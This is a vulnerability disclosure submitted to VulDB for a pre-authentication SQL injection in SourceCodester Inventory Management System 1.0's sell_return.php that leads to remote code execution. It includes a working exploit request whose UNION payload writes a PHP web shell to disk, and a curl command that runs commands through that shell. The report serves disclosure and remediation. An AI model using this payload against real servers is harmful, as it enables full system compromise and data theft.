إرسال #189166: Pre-Authentication RCE in Inventory Management System 1.0 sell_return.phpالمعلومات

عنوانPre-Authentication RCE in Inventory Management System 1.0 sell_return.php
الوصف ## Summary A SQL Injection vulnerability exists in SourceCodester Inventory Management System 1.0 via the pid parameter in sell_return.php. ## Issue Description SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This particular SQLi vulnerability allows UNION based injections, which indirectly leads to RCE. Improper authorization in a web application undermines its security by exposing sensitive functionalities and resources to unauthorized users. This particular authorization vulnerability allows an unauthorized user to access this resource. Improper authorization is a pervasive problem throughout this application. The affected script takes a value via a POST request and eventually concatenates it in a SQL query. sell_return.php line 11 ``` $pid = $_POST['pid']; ``` This value is parsed as an array which can be manipulated to contain a malicious payload sell_return.php lines 35-37 ``` for ($i=0; $i < count($orderQuantity); $i++) { // update product quantity $select_product_data = $pdo->prepare("SELECT * FROM `products` WHERE `id` = $pid[$i]"); ``` ## Affected URL/Area <host>/ample/app/action/sell_return.php This is supposed to only be accessible to a logged in administrator, but can be called directly due to the lack of authz checks. ## Risk Rating - Risk: **HIGH** - Difficulty to Exploit: **LOW** ## CVSS Justification ### Network The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet. This kind of vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). ### Low Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component. ### None The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the the vulnerable system to carry out an attack. ### None The vulnerable system can be exploited without interaction from any user. ### Changed An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component. ### High There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. ### High There is a total loss of data integrity. ### High There is a total loss of availability. ## Steps to reproduce Attacker makes this request ``` POST /ample/app/action/sell_return.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 350 return_id=1&customer_id=1&customer_name=1&pid[0]=1&pid[1]=1337 UNION ALL SELECT '<?php system($_GET["cmd"]); ?>', '', '', '', '', '', '', '', '', '', '', '', '', '', '' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' -- &pro_name=1&orderQuantity[0]=1&orderQuantity[1]=2&returnQty=1&sellPrice=1&return_subtotal=1&prev_due=1&return_netTotal=1&return_date=1 ``` Should now be able to use the malicious PHP script to execute commands. ``` curl http://localhost/rce.php?cmd=whoami ``` ## Affected Demographic/User Base Any users of this service for inventory management are at risk of having their data stolen, manipulated, or destroyed. The host of this server is at risk of system compromise. ## Recommended Fix Use RBAC to verify the authz and authn of a user. Do not pass user controlled data to SQL queries. Use prepared statements or parameterized queries instead. ## Note For the issued CVE ID, please credit Michael Blunt as the discovering researcher. List contact email as [email protected]. The author of this project has been contacted and this information minus this note has been shared. ## References ### SQLi https://cwe.mitre.org/data/definitions/89.html https://owasp.org/www-community/attacks/SQL_Injection https://www.rapid7.com/fundamentals/sql-injection-attacks/ https://en.wikipedia.org/wiki/SQL_injection https://brightsec.com/blog/sql-injection-attack/ ### Authz https://cwe.mitre.org/data/definitions/284.html https://cwe.mitre.org/data/definitions/285.html https://martellosecurity.com/kb/mitre/cwe/285/ https://docs.guardrails.io/docs/vulnerability-classes/insecure-authentication/improper-authentication https://www.invicti.com/blog/web-security/how-to-avoid-authentication-and-authorization-vulnerabilities/ ## Impact ### Attack Scenario An attacker who finds this system can forge a request to the sell_return.php endpoint and create a malicious PHP file. This PHP file can do anything the attacker wants within the confines of the server settings. This can result in remote code execution (RCE) and full control over the affected resource. Additionally, the attacker can call a reverse shell with the permissions of the user running the webapp. This is a UNION based injection attack, but more generally in the class of SQL injections: Attackers can use these types of attacks to modify, add, or delete data from the remote database.
المستخدم
 mikel22 (UID 51822)
ارسال31/07/2023 04:50 PM (3 سنوات منذ)
الاعتدال05/08/2023 06:45 PM (5 days later)
الحالةتمت الموافقة
إدخال VulDB236219 [SourceCodester Inventory Management System 1.0 sell_return.php pid حقن SQL]
النقاط17

Do you know our Splunk app?

Download it now for free!